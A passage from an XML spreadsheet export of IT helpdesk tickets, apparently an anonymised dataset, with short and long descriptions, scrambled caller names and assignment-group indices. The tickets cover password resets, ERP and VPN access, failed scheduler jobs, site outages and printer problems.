    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_957fail failed in job_scheduler at: 10/28/2016 02:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34 "/>
    <s v="unable to login to erp SID_34 "/>
    <s v="bioanvcz zgfiahyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm license for user dfgry"/>
    <s v="from: xdvwitpm zscxqdhoalaramdntyan _x000a_sent: friday, october 28, 2016 9:40 am_x000a_to: 'help@company.com'_x000a_cc: xyculgav cuqptoah_x000a_subject: fw: crm license for dfgry_x000a__x000a_hello,_x000a__x000a_crm is not installed in my laptop._x000a__x000a_please support me on this._x000a__x000a_"/>
    <s v="xdvwitpm zscxqdho"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="aljbtwsh lepkbgix"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/28/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/28/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="lvxakohq tsfnhowj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="apply for mobile phone access to mail box"/>
    <s v="apply for mobile phone access to mail box"/>
    <s v="hygiajzb ajvmhbsr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="data not correctly pulled for all the employees in the travel_tool attendee interface."/>
    <s v="data not correctly pulled for all the employees in the travel_tool attendee interface."/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="20"/>
  </r>
  <r>
    <s v="é’å²›å…´åˆæœºç”µshipment notificationé‚®ç®±è®¾ç½®"/>
    <s v="from:  _x000a_sent: friday, october 28, 2016 7:20 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: re: é’å²›å…´åˆæœºç”µshipment notificationé‚®ç®±è®¾ç½®_x000a__x000a_dearï¼Œ_x000a_pls help to update customer 4563729890 shipment notification email address :  abcdegy@gmail.com _x000a__x000a__x000a_b. "/>
    <s v="yafxlpwi lhxvatkb"/>
    <x v="17"/>
  </r>
  <r>
    <s v="to recover folder that by mistake copied to x:\ drive"/>
    <s v="i want recover folder_x000d__x000a_"/>
    <s v="pbtauqyx civyxdkl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 10/27/2016 22:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 10/27/2016 22:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage: india: site hard down since at 8:34 pm et on 10/27. no backup circuit."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______8:34 pm et on 10/27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no_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____na___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na_____    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _na______     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="nyscufdq wjtcsahz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user is not able to see all text in mails on his iphone"/>
    <s v="user is not able to see all text in mails on his iphone"/>
    <s v="yaxrnmsz bultagqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="ptaerwvk ibvpucyn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sync all mails in outlook on wifi"/>
    <s v="unable to sync all mails in outlook on wifi"/>
    <s v="vzrbocfl wxtpoyez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm tab does not appear on outlook"/>
    <s v="crm tab does not appear on outlook"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit expense report as it is locked by user"/>
    <s v="unable to submit expense report as it is locked by user"/>
    <s v="pvbomqht smfkuhwi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="titcket update on inplant_874008"/>
    <s v="titcket update on inplant_874008"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need to approve the new product requests below"/>
    <s v="i need to approve the new product requests below"/>
    <s v="uyrpdvoq mbzevtcx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="ticket update on inplant_873870"/>
    <s v="ticket update on inplant_873870"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="changed desktop wallpaper"/>
    <s v="changed desktop wallpaper"/>
    <s v="aqdjcuhn lagfitkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open website"/>
    <s v="_x000a_name:xbdht yrjhd_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:aqjdvexo.lmedazjo@gmail.com_x000a_customer number:_x000a_summary: benefit advisor will not run in my browser."/>
    <s v="aqjdvexo lmedazjo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm"/>
    <s v="assign crm and e4 license to nyrjkctu tbhkenlo-  use profile like qmglkaru qiwhfkdv."/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="22"/>
  </r>
  <r>
    <s v="sound"/>
    <s v="_x000d__x000a__x000d__x000a_received from: udetjzmn.ayueswcm@gmail.com_x000d__x000a__x000d__x000a_good afternoon_x000d__x000a__x000d__x000a_i am having issues again with my notebook in that i cannot get any sound and cannot participate in skype calls._x000d__x000a__x000d__x000a_"/>
    <s v="udetjzmn ayueswcm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need the username to submit the insurance"/>
    <s v="need the username to submit the insurance"/>
    <s v="kamtroxv oequfsky"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query on external browser "/>
    <s v="query on external browser "/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access benefits and other apps in hr_tool one time"/>
    <s v="unable to access benefits and other apps in hr_tool one time. access denied. "/>
    <s v="batsxwnl ashkzvnr"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to see the current course in ethics"/>
    <s v="unable to see the current course in ethics_x000a__x000a_user id - bdtryh3456_x000a_"/>
    <s v="ajgnibkx zixmcjgu"/>
    <x v="23"/>
  </r>
  <r>
    <s v="user clicked on driver update manually and then after restarting the machine he's receivng a error"/>
    <s v="user clicked on driver update manually and then after restarting the machine he received an error stating pnp_detected_fatal_error "/>
    <s v="nyscufdq wjtcsahz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 account unlock"/>
    <s v="erp SID_37 account unlock"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="gtxuamif pamxszek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephone number update"/>
    <s v="telephone number update"/>
    <s v="ufpkvlyn bozthrie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="insurance information"/>
    <s v="insurance information"/>
    <s v="gxvhauic zogmauli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please give chrtyad345 access to reporting_tool ltaballotcsalesemp  and map him to thrdy tgyu team as an ae in the virtual table"/>
    <s v="please give chrtyad345 access to reporting_tool ltaballotcsalesemp  and map him to thrdy tgyu team as an ae in the virtual table"/>
    <s v="icqleypr kneoblzd"/>
    <x v="19"/>
  </r>
  <r>
    <s v="loud noise // gso"/>
    <s v="loud noise // gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess kiosk user password reset"/>
    <s v="ess kiosk user password reset"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage  - warehouse: node company-ups-vpn-rtr is down 10/27/2016 9:54 am"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______10/27/2016 9:54 am___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no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x v="7"/>
  </r>
  <r>
    <s v="aw: ticket_no1561075 -- comments added"/>
    <s v="_x000a__x000a_received from: repyzajo.lxfwopyq@gmail.com_x000a__x000a_hi ,_x000a__x000a_i have uacyltoe hxgayczeed in SID_1 and it works now correctly._x000a_the accounting documents were generated automatically without any errors._x000a_i am approving the change._x000a__x000a_[cid:image001.png@01d23073.3ecd7430]_x000a__x000a__x000a_best "/>
    <s v="repyzajo lxfwopyq"/>
    <x v="17"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="woaiypxu dxslkbif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="export shipment of grinding mahcine to khdgd1234, apac - advance information"/>
    <s v="_x000a__x000a_received from: rdfjsawg.zpmxgdcw@gmail.com_x000a__x000a_from: hdytrkfiu_x000a_sent: thursday, october 27, 2016 4:46 pm_x000a_to: &lt;rfqhoaky.rncspbot@gmail.com&gt;; &lt;ikxjfnml.kaocbpfr@gmail.com&gt;; &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;_x000a_cc:  &lt;tshljagr.mhyiopxr@gmail.com&gt;; &lt;zgmdster.bdvcealj@gmail.com&gt;; xjzcbgnp vfkwscao &lt;xjzcbgnp.vfkwscao@gmail.com&gt;; &lt;avurmegj.pxgmjynu@gmail.com&gt;_x000a_subject: export shipment of grinding mahcine to khdgd1234, apac - advance information_x000a__x000a_we are pushixepyfbga wtqdyoin for dispatching an grinding machine to khdgd1234, apac tomorrow.    this is just for your advance information.   once everything is in place, we will seek your support in your areas to help us in clearing this consignment tomorrow 28.10.16.   "/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please add my work phone number to my profile "/>
    <s v="contact phone "/>
    <s v="jondkicb yahtgpuv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="adding members to dl "/>
    <s v="adding members to dl"/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="java issue on uacyltoe hxgaycze laptop."/>
    <s v="java issue on uacyltoe hxgaycze laptop."/>
    <s v="akhdmgwt yhgpafqx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="support fÃ¼r fa.gstry \arexjftu ohxdwngl"/>
    <s v="support fÃ¼r fa.konnica \arexjftu ohxdwngl"/>
    <s v="arexjftu ohxdwngl"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit bluescreen ."/>
    <s v="hallo ,_x000a__x000a_es ist erneut passiert. der pc hat sich zum wiederholten male aufgehÃ¤ngt und mir lediglich einen blauen bildschirm mit weisser schrift prÃ¤sentiert._x000a__x000a_was kÃ¶nnen wir da machen?_x000a__x000a_"/>
    <s v="vrfpyjwi nzhvgqiw"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/27/2016 09:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/27/2016 09:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="EU_tool crashes when confirmations are deleted - not able to remove scrap confirmations that have been rectified in erp"/>
    <s v="EU_tool crashes when confirmations are deleted - not able to remove scrap confirmations that have been rectified in erp"/>
    <s v="mlckvyfq aonlxvwb"/>
    <x v="25"/>
  </r>
  <r>
    <s v="enable bgdxitwu dhcopwxa' active directory account"/>
    <s v="enable bgdxitwu dhcopwxa' active directory account_x000a__x000a_name:fdgrty_x000a_email:kybgepnj.idszleru@gmail.com_x000a_summary:i need bgdxitwu dhcopwxa's active directory account enabled."/>
    <s v="kcwqdeob jwtpkzub"/>
    <x v="19"/>
  </r>
  <r>
    <s v="sync emails issue"/>
    <s v="sync emails issue"/>
    <s v="wjkzgyxh pktcqbxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="internet explorer issues"/>
    <s v="user is having issues with his internet explorer. the page keeps refreshing and ends up with a dll error."/>
    <s v="pbrmgyzo hzoxdijn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call "/>
    <s v="blank call "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view payslips"/>
    <s v="unable to view payslips"/>
    <s v="aqdjcuhn lagfitkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="customer not getting order acknowledgements automatically"/>
    <s v="_x000a__x000a_received from: ourhmqta.tjwnqexo@gmail.com_x000a__x000a_two customer accounts have not been getting the order acknowledgements automatically like they have been for the past 10 years. both are under the same top parent_x000a__x000a_accts 81184926657 and 81862217657 should automatically be sending acknowledgements to   hdyrugdty@gmail.com_x000a__x000a_since october 14'th they have not been getting them._x000a__x000a_can someone look into this?  this is affecting the customer paying the bills, as they use this acknowledgement as a receiver so they can pay the bill._x000a__x000a__x000a_senior sales engineer_x000a_company, inc_x000a_ourhmqta.tjwnqexo@gmail.com_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="kgqpwvzu rkexzwlh"/>
    <x v="12"/>
  </r>
  <r>
    <s v="production order locked."/>
    <s v="production order 226061609 is locked by user, gtxuamif pamxszek. no one has been able to unlock. can this order be unlocked?_x000a__x000a_inspection lot 040001149576588 is being processed by gtxuamif pamxszek"/>
    <s v="aqgphjbc utjrsedy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="i need access to finance section of hub"/>
    <s v="_x000a__x000a_received from: bwfhtumx.japznrvb@gmail.com_x000a__x000a_i could always get into the finance section, and now i can't.  i need access, please._x000a__x000a_[cid:image001.jpg@01d2302e.562bddf0]_x000a__x000a_bwfhtumx japznrvb_x000a_regional controller_x000a_bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;_x000a_"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="jfsmwpny klxsdqiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i've received the message below. can you tell me from whom the email mentioned was sent ?"/>
    <s v="i've received the message below. can you tell me from whom the email mentioned was sent ?"/>
    <s v="xawlkiey demjqrfl"/>
    <x v="26"/>
  </r>
  <r>
    <s v="email address confirmation"/>
    <s v="email address confirmation"/>
    <s v="fyokahtw sidurjge"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp pi and msd crm connectivity issue- serirtce certificate renewal"/>
    <s v="hi all_x000a__x000a_we have a connectivity issue between erp pi and msd crm due to certificate renewal on azure websites and that certificate is not yet updated on erp pi side._x000a__x000a_issue: changes to data records (accounts, sales area data, partner functions, contacts, leads) are not being processed from erp pi to _x000a_worked with IT_x000a__x000a__x000a_msd crm and vice versa in all environments (prod, qa and dev)._x000a_issue start time: 24th oct ~8:15pm_x000a__x000a_troubleshooting steps: _x000a_1. when tryhdty from customer master team reported the issue that a prospect account created in erp didn't come into msd yet â€“ erp pi team observed that the records are in &quot;still awaiting acknowledgement&quot; status â€“ which basically means they are not yet delivered/received by the target system._x000a_2. upon some log analysis and trying to identify the root cause between erp pi, basis and msd teams â€“ it's been observed that the issue has started in production environment since around 8:15pm est on 24th oct._x000a_3. we observed the same behavior with azure mfg_tool and erp pi logs of other non-production environments as well._x000a_4. you can find error screenshots from erp pi system in the mail chain._x000a__x000a_root cause: it appears that the certificate for azure webapps have been updated on 29th sept 2016 as it is nearing the expiration date (11th jan 2017). but the new certificate is not updated on erp pi (they are not even aware of this change!). so, when the production azure webapp (company-crm-sp-mfg_toolt.azurewebsites.net) got restarted on 24th oct around 8:15pm â€“ this connectivity appears to have been broken._x000a__x000a_next steps: _x000a_1. we need the azure webapp certificate chain to be sent to erp basis team so that they can update it on erp pi system. whom can i reach out to for receiving the certificate details? do we have an azure admin in house or do you want me to open a case with microsoft?_x000a_2. once certificate is received, maybe we can first do this on qa system and then upon confirmation that it works, we can apply it to production and other environments._x000a_"/>
    <s v="kgytujhe bonhwzrx"/>
    <x v="13"/>
  </r>
  <r>
    <s v="printer problem / issue information"/>
    <s v="please complete all required questions below.  _x000a_if not, it will be returned back to the gsc / requester to provide required information_x000a__x000a_ â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart._x000a__x000a_   â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) kd05_x000a_ _x000a_   â€¢  detailed description of the problem ? error - says i need to download and install a software driver from the \\HostName_769 computer to print to kd05_x000a__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) word_x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000a__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /)  windows_x000a__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  not sure what this means_x000a__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)  not erp_x000a__x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?  not erp_x000a_         what printer can it be rerouted too? _x000a__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket."/>
    <s v="dzjxrkae grqczsmx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="power outage :australia australia: site hard down since at 7.31am et on 10/27."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000a__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000a__x000a_2. when did it start  ?   ______7.31am et on 10/27.________________x000a__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000a_                _x000a_4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000a__x000a_5. does site have a backup circuit ?  yes______    (yes/no/na) _x000a__x000a_6. backup circuit active ?   ___no_____     (yes/no/na) _x000a__x000a_7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) _x000a__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000a__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000a__x000a_10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000a__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________global_telecom_2 # 272076960 _________________       _x000a__x000a_12. notified  gsc  ___na_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000a__x000a_13.  additional diagnostics"/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to log into erp "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ygkzwsud.cvjgkxws@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_i am unable to log into my erp account, even the correct password id not accepted._x000d__x000a__x000d__x000a_need resolution on very urgent basis._x000d__x000a__x000d__x000a_"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="hcplzsxg qkujnapl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="activate iphone "/>
    <s v="iygsxftl hysrbgad set up a spare &quot;company owned&quot; iphone, cause the old one was broken._x000d__x000a_agreement and supervisors appoval is attached_x000d__x000a_now his account is quarantined._x000d__x000a_could you please activate his new device._x000d__x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>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serckxqb mljnkgze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print to printer"/>
    <s v="ic: welcome, our next available agent will be with you shortly..._x000a_ic: interaction alerting agent._x000a_ic: website visitor has joined the conversation_x000a_ayrhcfxi zartupsw: hi _x000a_ayrhcfxi zartupsw: "/>
    <s v="vsbtygin oufhtbas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 10/27/2016 06:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 10/27/2016 06:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook crashing"/>
    <s v="ic: welcome, our next available agent will be with you shortly..._x000a_ic: interaction alerting agent._x000a_ic: website visitor has joined the conversation_x000a_ayrhcfxi zartupsw: hello _x000a_gstdy yrada: hi_x000a_ayrhcfxi zartupsw: hello, "/>
    <s v="tphbruoq xtukhnym"/>
    <x v="27"/>
  </r>
  <r>
    <s v="need file restored on t drive"/>
    <s v="ic: welcome, our next available agent will be with you shortly..._x000d__x000a_ic: interaction alerting agent._x000d__x000a_ic: website visitor has joined the conversation_x000d__x000a_ayrhcfxi zartupsw: hello, "/>
    <s v="kslhobgj cyhvefna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="SID_1 logon balancing error"/>
    <s v="ic: welcome, our next available agent will be with you shortly..._x000a_ic: interaction alerting agent._x000a_ic: website visitor has joined the conversation_x000a_tyss ashdtyf: greetings_x000a_ayrhcfxi zartupsw: , hi _x000a_ayrhcfxi zartupsw: "/>
    <s v="zstkagwu jlyrhdcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to sfb"/>
    <s v="name:obanjrhg rnafleys_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:obanjrhg.rnafleys@gmail.com_x000a_customer number:_x000a_summary:hello,_x000a_problem signing in to skype"/>
    <s v="obanjrhg rnafleys"/>
    <x v="27"/>
  </r>
  <r>
    <s v="reset the password for fygrwuna gomcekzi on e-mail"/>
    <s v="bitte passwort fÃ¼r fygrwuna gomcekzi e-mail zurÃ¼cksetzen_x000a_bitte neues passwort zu cwrikael.oanmsecr@gmail.com (manager) "/>
    <s v="fygrwuna gomcekzi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password resetfor SID_37"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xyculgav.cuqptoah@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please unlock and reset my password for SID_37 system._x000d__x000a__x000d__x000a_"/>
    <s v="xyculgav cuqptoah"/>
    <x v="0"/>
  </r>
  <r>
    <s v="babiluntr client license expired and client is now in uacyltoe hxgaycze mode - eagl8111495 - tel.: -474"/>
    <s v="babiluntr client license expired and client is now in uacyltoe hxgaycze mode - eagl8111495 - tel.: -474"/>
    <s v="dkinobsv wymgzcrh"/>
    <x v="28"/>
  </r>
  <r>
    <s v="outbound calls not possible via germany pbx system - inbound calls are working fine - please check"/>
    <s v="outbound calls not possible via germany pbx system - inbound calls are working fine - please check"/>
    <s v="dqeowzux cjorxvew"/>
    <x v="28"/>
  </r>
  <r>
    <s v="probleme mit laufwerk z: \laeusvjo fvaihgpx"/>
    <s v="probleme mit laufwerk z: \laeusvjo fvaihgpx"/>
    <s v="laeusvjo fvaihgpx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="pls also extend mm#7389861 &amp; 7421988 to my purchasing user account. need to create prs for both mm#."/>
    <s v="pls also extend mm#7389861 &amp; 7421988 to my purchasing user account. need to create prs for both mm#. "/>
    <s v="ckitashy dnqojbwi"/>
    <x v="29"/>
  </r>
  <r>
    <s v="the t/o can not be generated for dn 8058611713"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to check dn 9169722824,t/o can not be generated for this dn, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="itry to open a excel file with microsoft online but not work"/>
    <s v="name:_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfrsnagc.mhakdfjo@gmail.com_x000a_customer number:_x000a_summary:itry to open a excel file with microsoft online but not work"/>
    <s v="mfrsnagc mhakdfjo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to hr_tool "/>
    <s v="unable to login to hr_tool _x000a__x000a_"/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2-i have been unable to access my pay&amp;taxes tab for several days. hangs on a time clock. what do i need to do to reso"/>
    <s v="from: gstdy tehdy _x000a_sent: thursday, october 27, 2016 11:53 am_x000a_to: vkjdgtxb pkinmjqs_x000a_subject: re:  fw: access to e-time_x000a__x000a_dear ,_x000a__x000a__x000a_"/>
    <s v="vkjdgtxb pkinmjqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client not working"/>
    <s v="business_client not working"/>
    <s v="jbiuvsfk pkvgyhqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reporting_tool erp hana error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lhejbwkc.xbmyvnqf@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_everytime i want to set a filter in reporting_tool with data source_x000d__x000a__x000d__x000a_pk_publish_pk_otc_billing_otc_billing_s_x000d__x000a__x000d__x000a_i am getting below error message:_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d2302e.38de0930]_x000d__x000a__x000d__x000a_"/>
    <s v="lhejbwkc xbmyvnqf"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 10/27/2016 02:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 10/27/2016 02:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="please reset my erp and bex password - seem to by not synchronized - thanks!"/>
    <s v="_x000a__x000a_received from: fmzdkyqv.dbrslnhe@gmail.com_x000a__x000a_fmzdkyqv dbrslnhe_x000a__x000a_director finance business_x000a_company_x000a__x000a_fmzdkyqv.dbrslnhe@gmail.com&lt;mailto:fmzdkyqv.dbrslnhe@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="fmzdkyqv dbrslnhe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver funktioniert nicht mehr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fcyuqvoj.ajqeidlm@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_netweaver funktioniert nicht mehr, bzw. kann ich nicht mehr Ã¶ffnen._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d23026.26b6a440]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fcyuqvoj ajqeidlm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a kÃ¼ndigung for fgxprnub hlanwgqj, 11161827, effective 31.05.2017 has been approved. "/>
    <s v="a kÃ¼ndigung for fgxprnub hlanwgqj, 11161827, effective 31.05.2017 has been approved. "/>
    <s v="ucawbivs ountxzir"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/27/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/27/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook setting is changed "/>
    <s v="outlook setting is changed "/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2584 failed in job_scheduler at: 10/27/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2584 failed in job_scheduler at: 10/27/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="neues passwort fÃ¼r accountname tgryhu hgygrtui"/>
    <s v="neues passwort fÃ¼r accountname tgryhu hgygrtui. passwort fÃ¼r diesen account funktioniert nicht mehr. mitarbeiter ist in kw4456 und 4567 auf frÃ¼hschicht anwesend."/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="check status tab is not appearing in purchasing screen"/>
    <s v="check status button is not seen in my purchasing screen"/>
    <s v="shjbrutf iknuqswm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer problem / issue information"/>
    <s v="drucker / scanner em85678_x000a_ _x000a_ scanner findet pfad nicht mehr!"/>
